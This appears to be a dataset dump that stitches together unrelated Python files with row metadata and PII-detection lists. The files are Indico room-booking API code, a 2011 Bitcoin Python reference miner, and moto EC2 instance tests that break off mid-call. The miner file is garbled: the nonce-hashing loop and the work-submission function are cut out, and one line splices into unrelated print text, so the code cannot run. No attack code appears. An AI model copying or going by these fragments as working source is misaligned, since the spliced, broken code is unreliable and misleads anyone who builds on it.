if not self._fromDT or not self._toDT or self._fromDT.date() != self._toDT.date():
raise HTTPAPIError('from/to must be on the same day')
elif self._fromDT >= self._toDT:
raise HTTPAPIError('to must be after from')
elif self._fromDT < datetime.now():
raise HTTPAPIError('You cannot make bookings in the past')
username = get_query_parameter(self._queryParams, 'username')
avatars = username and filter(None, AuthenticatorMgr().getAvatarByLogin(username).itervalues())
if not avatars:
raise HTTPAPIError('Username does not exist')
elif len(avatars) != 1:
raise HTTPAPIError('Ambiguous username ({} users found)'.format(len(avatars)))
avatar = avatars[0]
self._params = {
'room_id': get_query_parameter(self._queryParams, 'roomid'),
'reason': get_query_parameter(self._queryParams, 'reason'),
'booked_for': avatar,
'from': self._fromDT,
'to': self._toDT
}
missing = [key for key, val in self._params.iteritems() if not val]
if missing:
raise HTTPAPIError('Required params missing: {}'.format(', '.join(missing)))
self._room = Room.get(self._params['room_id'])
if not self._room:
raise HTTPAPIError('A room with this ID does not exist')
def _hasAccess(self, aw):
if not Config.getInstance().getIsRoomBookingActive() or not rb_check_user_access(aw.getUser()):
return False
if self._room.can_be_booked(aw.getUser()):
return True
elif self._room.can_be_prebooked(aw.getUser()):
raise HTTPAPIError('The API only supports direct bookings but this room only allows pre-bookings.')
return False
def api_roomBooking(self, aw):
data = MultiDict({
'start_dt': self._params['from'],
'end_dt': self._params['to'],
'repeat_frequency': RepeatFrequency.NEVER,
'repeat_interval': 0,
'room_id': self._room.id,
'booked_for_id': self._params['booked_for'].getId(),
'contact_email': self._params['booked_for'].getEmail(),
'contact_phone': self._params['booked_for'].getTelephone(),
'booking_reason': self._params['reason']
})
try:
reservation = Reservation.create_from_data(self._room, data, aw.getUser())
except ConflictingOccurrences:
raise HTTPAPIError('Failed to create the booking due to conflicts with other bookings')
except IndicoError as e:
raise HTTPAPIError('Failed to create the booking: {}'.format(e))
db.session.add(reservation)
db.session.flush()
return {'reservationID': reservation.id}
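# Illustrative request served by BookRoomHook above (the path shape is assumed
# from PREFIX/TYPES/RE; the exact from/to date format is whatever the base
# HTTPAPIHook parser accepts):
#   POST /api/roomBooking/bookRoom.json?roomid=23&reason=Demo&username=jdoe
#        &from=2014-01-01T09:00&to=2014-01-01T10:00
# On success the response payload contains {'reservationID': <new id>}.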
def _export_reservations(hook, limit_per_room, include_rooms, extra_filters=None):
""""""Exports reservations.
:param hook: The HTTPAPIHook instance
:param limit_per_room: Should the limit/offset be applied per room
:param include_rooms: Should reservations include room information
""""""
filters = list(extra_filters) if extra_filters else []
if hook._fromDT and hook._toDT:
filters.append(cast(Reservation.start_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) <= hook._toDT.time())
filters.append(cast(Reservation.end_dt, Time) >= hook._fromDT.time())
elif hook._toDT:
filters.append(cast(Reservation.end_dt, Date) <= hook._toDT.date())
filters.append(cast(Reservation.end_dt, Time) <= hook._toDT.time())
elif hook._fromDT:
filters.append(cast(Reservation.start_dt, Date) >= hook._fromDT.date())
filters.append(cast(Reservation.start_dt, Time) >= hook._fromDT.time())
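    # Note: the Date and Time casts above constrain dates and times-of-day
    # independently, so a from/to pair behaves like a per-day time window
    # rather than one continuous datetime range.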
filters += _get_reservation_state_filter(hook._queryParams)
occurs = [datetime.strptime(x, '%Y-%m-%d').date()
for x in filter(None, get_query_parameter(hook._queryParams, ['occurs'], '').split(','))]
data = ['vc_equipment']
if hook._occurrences:
data.append('occurrences')
order = {
'start': Reservation.start_dt,
'end': Reservation.end_dt
}.get(hook._orderBy, Reservation.start_dt)
if hook._descending:
order = order.desc()
reservations_data = Reservation.get_with_data(*data, filters=filters, limit=hook._limit, offset=hook._offset,
order=order, limit_per_room=limit_per_room, occurs_on=occurs)
for result in reservations_data:
yield result['reservation'].room_id, _serializable_reservation(result, include_rooms)
def _serializable_room(room_data, reservations=None):
""""""Serializable room data
:param room_data: Room data
:param reservations: MultiDict mapping for room id => reservations
""""""
data = room_data['room'].to_serializable('__api_public__')
data['_type'] = 'Room'
data['avc'] = bool(room_data['vc_equipment'])
data['vcList'] = room_data['vc_equipment']
data['equipment'] = room_data['non_vc_equipment']
if reservations is not None:
data['reservations'] = reservations.getlist(room_data['room'].id)
return data
def _serializable_room_minimal(room):
""""""Serializable minimal room data (inside reservations)
:param room: A `Room`
""""""
data = room.to_serializable('__api_minimal_public__')
data['_type'] = 'Room'
return data
def _serializable_reservation(reservation_data, include_room=False):
""""""Serializable reservation (standalone or inside room)
:param reservation_data: Reservation data
:param include_room: Include minimal room information
""""""
reservation = reservation_data['reservation']
data = reservation.to_serializable('__api_public__', converters={datetime: _add_server_tz})
data['_type'] = 'Reservation'
data['repeatability'] = None
if reservation.repeat_frequency:
data['repeatability'] = RepeatMapping.get_short_name(*reservation.repetition)
data['vcList'] = reservation_data['vc_equipment']
if include_room:
data['room'] = _serializable_room_minimal(reservation_data['reservation'].room)
if 'occurrences' in reservation_data:
data['occurrences'] = [o.to_serializable('__api_public__', converters={datetime: _add_server_tz})
for o in reservation_data['occurrences']]
return data
def _ical_serialize_repeatability(data):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = data['endDT'].astimezone(pytz.utc)
WEEK_DAYS = 'MO TU WE TH FR SA SU'.split()
recur = ical.vRecur()
recur['until'] = end_dt_utc
if data['repeat_frequency'] == RepeatFrequency.DAY:
recur['freq'] = 'daily'
elif data['repeat_frequency'] == RepeatFrequency.WEEK:
recur['freq'] = 'weekly'
recur['interval'] = data['repeat_interval']
elif data['repeat_frequency'] == RepeatFrequency.MONTH:
recur['freq'] = 'monthly'
recur['byday'] = '{}{}'.format(start_dt_utc.day // 7, WEEK_DAYS[start_dt_utc.weekday()])
return recur
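# Worked example for the monthly branch above: a booking starting on the 15th,
# a Tuesday, yields byday '2TU' (15 // 7 == 2). RFC 5545 numbers weekday
# occurrences from 1, so it is worth verifying this prefix against the
# iCalendar consumer in use.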
def _ical_serialize_reservation(cal, data, now):
start_dt_utc = data['startDT'].astimezone(pytz.utc)
end_dt_utc = datetime.combine(data['startDT'].date(), data['endDT'].timetz()).astimezone(pytz.utc)
event = icalendar.Event()
    event.add('uid', 'indico-resv-%s@example.com' % data['id'])  # uid host is a placeholder; the original domain was scrubbed
event.add('dtstamp', now)
event.add('dtstart', start_dt_utc)
event.add('dtend', end_dt_utc)
event.add('url', data['bookingUrl'])
event.add('summary', data['reason'])
event.add('location', u'{}: {}'.format(data['location'], data['room']['fullName']))
event.add('description', data['reason'].decode('utf-8') + '\n\n' + data['bookingUrl'])
if data['repeat_frequency'] != RepeatFrequency.NEVER:
event.add('rrule', _ical_serialize_repeatability(data))
cal.add_component(event)
def _add_server_tz(dt):
if dt.tzinfo is None:
return dt.replace(tzinfo=get_timezone(HelperMaKaCInfo.getMaKaCInfoInstance().getTimezone()))
return dt
def _yesno(value):
return value.lower() in {'yes', 'y', '1', 'true'}
def _get_reservation_state_filter(params):
cancelled = get_query_parameter(params, ['cxl', 'cancelled'])
rejected = get_query_parameter(params, ['rej', 'rejected'])
confirmed = get_query_parameter(params, ['confirmed'])
archived = get_query_parameter(params, ['arch', 'archived', 'archival'])
repeating = get_query_parameter(params, ['rec', 'recurring', 'rep', 'repeating'])
avc = get_query_parameter(params, ['avc'])
avc_support = get_query_parameter(params, ['avcs', 'avcsupport'])
startup_support = get_query_parameter(params, ['sts', 'startupsupport'])
booked_for = get_query_parameter(params, ['bf', 'bookedfor'])
filters = []
if cancelled is not None:
filters.append(Reservation.is_cancelled == _yesno(cancelled))
if rejected is not None:
filters.append(Reservation.is_rejected == _yesno(rejected))
if confirmed is not None:
if confirmed == 'pending':
filters.append(Reservation.is_pending)
elif _yesno(confirmed):
filters.append(Reservation.is_accepted)
else:
filters.append(~Reservation.is_accepted)
filters.append(Reservation.is_rejected | Reservation.is_cancelled)
if archived is not None:
filters.append(Reservation.is_archived == _yesno(archived))
if repeating is not None:
if _yesno(repeating):
filters.append(Reservation.repeat_frequency != 0)
else:
filters.append(Reservation.repeat_frequency == 0)
if avc is not None:
filters.append(Reservation.uses_vc == _yesno(avc))
if avc_support is not None:
filters.append(Reservation.needs_vc_assistance == _yesno(avc_support))
if startup_support is not None:
filters.append(Reservation.needs_assistance == _yesno(startup_support))
if booked_for:
like_str = '%{}%'.format(booked_for.replace('?', '_').replace('*', '%'))
filters.append(Reservation.booked_for_name.ilike(like_str))
return filters
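# Illustrative export query combining the state filters above (parameter
# aliases as read by _get_reservation_state_filter, boolean values in any
# form _yesno accepts):
#   /export/reservation/CERN.json?confirmed=yes&avc=no&bf=smith&occ=1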
",16517,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'Indico'], ['DATE_TIME', '2002 - 2013'], ['LOCATION', '#'], ['LOCATION', '#'], ['NRP', 'indico.modules.rb.models.rooms'], ['LOCATION', 'super(RoomBookingHookBase'], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'loc = Location.find_first(name='], ['PERSON', 'DEFAULT_DETAIL'], ['PERSON', 'jsonp'], ['PERSON', 'self)._getParams'], ['PERSON', 'self)._getParams'], ['DATE_TIME', ""the same day'""], ['PERSON', ""HTTPAPIError('You""], ['PERSON', 'NEVER'], ['PERSON', ""self._params['reason""], ['PERSON', 'db.session.flush'], ['PERSON', 'include_rooms'], ['PERSON', '.split'], ['PERSON', 'reservations_data = Reservation.get_with_data(*data'], ['PERSON', 'include_rooms'], ['NRP', 'MultiDict'], ['LOCATION', 'serializable_reservation(reservation_data'], ['DATE_TIME', 'daily'], ['DATE_TIME', 'weekly'], ['DATE_TIME', 'monthly'], ['DATE_TIME', 'WEEK_DAYS[start_dt_utc.weekday'], ['PERSON', ""data['id""], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'RepeatFrequency.NE'], ['PERSON', 'bookedfor'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'indico.core.co'], ['URL', 'indico.co'], ['URL', 'indico.core.er'], ['URL', 'indico.mo'], ['URL', 'indico.modules.rb.models.re'], ['URL', 'indico.modules.rb.mo'], ['URL', 'indico.modules.rb.models.ro'], ['URL', 'indico.web.ht'], ['URL', 'indico.web.ht'], ['URL', 'api.me'], ['URL', 'indico.web.ht'], ['URL', 'api.re'], ['URL', 'indico.web.ht'], ['URL', 'MaKaC.au'], ['URL', 'MaKaC.common.in'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'Room.id.in'], ['URL', 'loc.id'], ['URL', 'Reservation.ro'], ['URL', 'id.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Config.ge'], ['URL', 'Location.fi'], ['URL', 'Room.ge'], ['URL', 'loc.id'], ['URL', 'Room.name.il'], ['URL', 'HTTPAPIHook.re'], ['URL', 'Location.fi'], ['URL', 'Location.name.in'], ['URL', 'HTTPAPIHook.re'], ['URL', 'fromDT.as'], ['URL', 'toDT.as'], ['URL', 'datetime.no'], ['URL', 'params.it'], ['URL', 'Room.ge'], ['URL', 'Config.ge'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'room.ca'], ['URL', 'aw.ge'], ['URL', 'RepeatFrequency.NE'], ['URL', 'room.id'], ['URL', 'Reservation.cr'], ['URL', 'aw.ge'], ['URL', 'db.session.ad'], ['URL', 'db.se'], ['URL', 'reservation.id'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'datetime.st'], ['URL', 'Reservation.st'], ['URL', 'Reservation.st'], ['URL', 'order.de'], ['URL', 'Reservation.ge'], ['URL', 'reservations.ge'], ['URL', 'room.to'], ['URL', 'reservation.to'], ['URL', 'reservation.re'], ['URL', 'RepeatMapping.ge'], ['URL', 'reservation.re'], ['URL', 'o.to'], ['URL', 'RepeatFrequency.MO'], ['URL', 'datetime.com'], ['URL', 'event.ad'], ['URL', 'email.com'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'event.ad'], ['URL', 'cal.ad'], ['URL', 'dt.tz'], ['URL', 'dt.re'], ['URL', 'HelperMaKaCInfo.ge'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.is'], ['URL', 'Reservation.re'], ['URL', 'Reservation.re'], ['URL', 'Reservation.us'], ['URL', 
'Reservation.ne'], ['URL', 'Reservation.ne'], ['URL', 'for.re'], ['URL', 'Reservation.bo'], ['URL', 'name.il']]"
67,"#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = ""%s:%s"" % (username, password)
self.authhdr = ""Basic %s"" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print ""JSON-RPC: no response""
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print ""JSON-RPC: cannot JSON-decode body""
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print ""JSON-RPC: no result in object""
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
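# Convention used throughout this miner: rpc.getwork() with no params fetches
# fresh work ({'data': ..., 'target': ...}) from the upstream node, while
# rpc.getwork([solution]) submits a candidate solution (see Miner.submit_work).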
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
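# Quick sanity check (illustrative; '@I' uses native byte order, assumed
# little-endian here): for the 8-byte buffer '12345678', bufreverse swaps
# bytes within each 4-byte word -> '43218765', while wordreverse swaps the
# words themselves -> '56781234'.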
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("" Upstream RPC result:"", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print ""HashMeter(%d): %d hashes, %.2f Khash/sec"" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print ""Usage: pyminer.py CONFIG-FILE""
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 9131
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print ""Missing username and/or password in cfg file""
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), ""Miner Stops - %s:%s"" % (settings['host'], settings['port'])
",6434,"[['DATE_TIME', '2011'], ['PERSON', ""out_words.append(struct.pack('@I""], ['PERSON', 'Miner'], ['LOCATION', 'targetstr'], ['DATE_TIME', 'the first 76b of 80b'], ['DATE_TIME', '16'], ['PERSON', 'hash1 = hash1_o.digest'], ['LOCATION', 'hash_o.update(hash1'], ['PERSON', 'param_arr ='], ['PERSON', 'hashes_done'], ['DATE_TIME', 'time_end - time_start'], ['PERSON', 'hashes_done'], ['PERSON', 'hashes_done'], ['PERSON', 'scantime'], ['URL', 'http://www.opensource.org/licenses/mit-license.php.'], ['IP_ADDRESS', '::'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pprint.Pr'], ['URL', 'self.au'], ['URL', 'self.co'], ['URL', 'httplib.HT'], ['URL', 'self.conn.re'], ['URL', 'self.au'], ['URL', 'self.conn.ge'], ['URL', 'resp.re'], ['URL', 'struct.pa'], ['URL', 'words.re'], ['URL', 'self.id'], ['URL', 'self.ma'], ['URL', 'datastr.de'], ['URL', 'targetstr.de'], ['URL', 'hashlib.sh'], ['URL', 'self.ma'], ['URL', 'struct.pa'], ['URL', 'hash.co'], ['URL', 'hashlib.sh'], ['URL', 'time.as'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.as'], ['URL', 'rpc.ge'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'self.id'], ['URL', 'self.su'], ['URL', 'self.it'], ['URL', 'sys.ar'], ['URL', 'pyminer.py'], ['URL', 'sys.ar'], ['URL', 're.se'], ['URL', 're.se'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'f.cl'], ['URL', 'p.st'], ['URL', 'time.sl'], ['URL', 'time.as'], ['URL', 'proc.jo'], ['URL', 'time.as']]"
68,"from __future__ import unicode_literals
from botocore.exceptions import ClientError
import pytest
from unittest import SkipTest
import base64
import ipaddress
import six
import boto
import boto3
from boto.ec2.instance import Reservation, InstanceAttribute
from boto.exception import EC2ResponseError
from freezegun import freeze_time
import sure # noqa
from moto import mock_ec2_deprecated, mock_ec2, settings
from tests import EXAMPLE_AMI_ID
from tests.helpers import requires_boto_gte
if six.PY2:
decode_method = base64.decodestring
else:
decode_method = base64.decodebytes
################ Test Readme ###############
def add_servers(ami_id, count):
conn = boto.connect_ec2()
for index in range(count):
conn.run_instances(ami_id)
@mock_ec2_deprecated
def test_add_servers():
add_servers(EXAMPLE_AMI_ID, 2)
conn = boto.connect_ec2()
reservations = conn.get_all_reservations()
assert len(reservations) == 2
instance1 = reservations[0].instances[0]
assert instance1.image_id == EXAMPLE_AMI_ID
############################################
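# All tests below run against moto's in-memory EC2 backend: the @mock_ec2 /
# @mock_ec2_deprecated decorators patch boto/boto3 so that no real AWS calls
# are made and no credentials are required.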
@freeze_time(""2014-01-01 05:00:00"")
@mock_ec2_deprecated
def test_instance_launch_and_terminate():
conn = boto.ec2.connect_to_region(""us-east-1"")
with pytest.raises(EC2ResponseError) as ex:
reservation = conn.run_instances(EXAMPLE_AMI_ID, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set""
)
reservation = conn.run_instances(EXAMPLE_AMI_ID)
reservation.should.be.a(Reservation)
reservation.instances.should.have.length_of(1)
instance = reservation.instances[0]
instance.state.should.equal(""pending"")
reservations = conn.get_all_reservations()
reservations.should.have.length_of(1)
reservations[0].id.should.equal(reservation.id)
instances = reservations[0].instances
instances.should.have.length_of(1)
instance = instances[0]
instance.id.should.equal(instance.id)
instance.state.should.equal(""running"")
instance.launch_time.should.equal(""2014-01-01T05:00:00.000Z"")
instance.vpc_id.shouldnt.equal(None)
instance.placement.should.equal(""us-east-1a"")
root_device_name = instance.root_device_name
instance.block_device_mapping[root_device_name].status.should.equal(""in-use"")
volume_id = instance.block_device_mapping[root_device_name].volume_id
volume_id.should.match(r""vol-\w+"")
volume = conn.get_all_volumes(volume_ids=[volume_id])[0]
volume.attach_data.instance_id.should.equal(instance.id)
volume.status.should.equal(""in-use"")
with pytest.raises(EC2ResponseError) as ex:
conn.terminate_instances([instance.id], dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set""
)
conn.terminate_instances([instance.id])
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.state.should.equal(""terminated"")
@mock_ec2
def test_instance_terminate_discard_volumes():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
""DeviceName"": ""/dev/sda1"",
""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": True},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert not list(ec2_resource.volumes.all())
@mock_ec2
def test_instance_terminate_keep_volumes_explicit():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
""DeviceName"": ""/dev/sda1"",
""Ebs"": {""VolumeSize"": 50, ""DeleteOnTermination"": False},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 1
@mock_ec2
def test_instance_terminate_keep_volumes_implicit():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}}],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(instance_volume_ids) == 1
volume = ec2_resource.Volume(instance_volume_ids[0])
volume.state.should.equal(""available"")
@mock_ec2
def test_instance_terminate_detach_volumes():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},
{""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}},
],
)
instance = result[0]
for volume in instance.volumes.all():
response = instance.detach_volume(VolumeId=volume.volume_id)
response[""State""].should.equal(""detaching"")
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 2
@mock_ec2
def test_instance_detach_volume_wrong_path():
ec2_resource = boto3.resource(""ec2"", ""us-west-1"")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{""DeviceName"": ""/dev/sda1"", ""Ebs"": {""VolumeSize"": 50}},],
)
instance = result[0]
for volume in instance.volumes.all():
with pytest.raises(ClientError) as ex:
instance.detach_volume(VolumeId=volume.volume_id, Device=""/dev/sdf"")
ex.value.response[""Error""][""Code""].should.equal(""InvalidAttachment.NotFound"")
ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)
ex.value.response[""Error""][""Message""].should.equal(
""The volume {0} is not attached to instance {1} as device {2}"".format(
volume.volume_id, instance.instance_id, ""/dev/sdf""
)
)
@mock_ec2_deprecated
def test_terminate_empty_instances():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError)
@freeze_time(""2014-01-01 05:00:00"")
@mock_ec2_deprecated
def test_instance_attach_volume():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
vol1 = conn.create_volume(size=36, zone=conn.region.name)
vol1.attach(instance.id, ""/dev/sda1"")
vol1.update()
vol2 = conn.create_volume(size=65, zone=conn.region.name)
vol2.attach(instance.id, ""/dev/sdb1"")
vol2.update()
vol3 = conn.create_volume(size=130, zone=conn.region.name)
vol3.attach(instance.id, ""/dev/sdc1"")
vol3.update()
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.block_device_mapping.should.have.length_of(3)
for v in conn.get_all_volumes(
volume_ids=[instance.block_device_mapping[""/dev/sdc1""].volume_id]
):
v.attach_data.instance_id.should.equal(instance.id)
# can do due to freeze_time decorator.
v.attach_data.attach_time.should.equal(instance.launch_time)
# can do due to freeze_time decorator.
v.create_time.should.equal(instance.launch_time)
v.region.name.should.equal(instance.region.name)
v.status.should.equal(""in-use"")
@mock_ec2_deprecated
def test_get_instances_by_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
reservations = conn.get_all_reservations(instance_ids=[instance1.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(1)
reservation.instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(2)
instance_ids = [instance.id for instance in reservation.instances]
instance_ids.should.equal([instance1.id, instance2.id])
# Call get_all_reservations with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_reservations(instance_ids=[instance1.id, ""i-1234abcd""])
cm.value.code.should.equal(""InvalidInstanceID.NotFound"")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_get_paginated_instances():
client = boto3.client(""ec2"", region_name=""us-east-1"")
conn = boto3.resource(""ec2"", ""us-east-1"")
for i in range(100):
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
resp = client.describe_instances(MaxResults=50)
reservations = resp[""Reservations""]
reservations.should.have.length_of(50)
next_token = resp[""NextToken""]
next_token.should_not.be.none
resp2 = client.describe_instances(NextToken=next_token)
reservations.extend(resp2[""Reservations""])
reservations.should.have.length_of(100)
assert ""NextToken"" not in resp2.keys()
@mock_ec2
def test_create_with_tags():
ec2 = boto3.client(""ec2"", region_name=""us-west-2"")
instances = ec2.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
InstanceType=""t2.micro"",
TagSpecifications=[
{
""ResourceType"": ""instance"",
""Tags"": [
{""Key"": ""MY_TAG1"", ""Value"": ""MY_VALUE1""},
{""Key"": ""MY_TAG2"", ""Value"": ""MY_VALUE2""},
],
},
{
""ResourceType"": ""instance"",
""Tags"": [{""Key"": ""MY_TAG3"", ""Value"": ""MY_VALUE3""}],
},
],
)
assert ""Tags"" in instances[""Instances""][0]
len(instances[""Instances""][0][""Tags""]).should.equal(3)
@mock_ec2_deprecated
def test_get_instances_filtering_by_state():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
conn.terminate_instances([instance1.id])
reservations = conn.get_all_reservations(filters={""instance-state-name"": ""running""})
reservations.should.have.length_of(1)
# Since we terminated instance1, only instance2 and instance3 should be
# returned
instance_ids = [instance.id for instance in reservations[0].instances]
set(instance_ids).should.equal(set([instance2.id, instance3.id]))
reservations = conn.get_all_reservations(
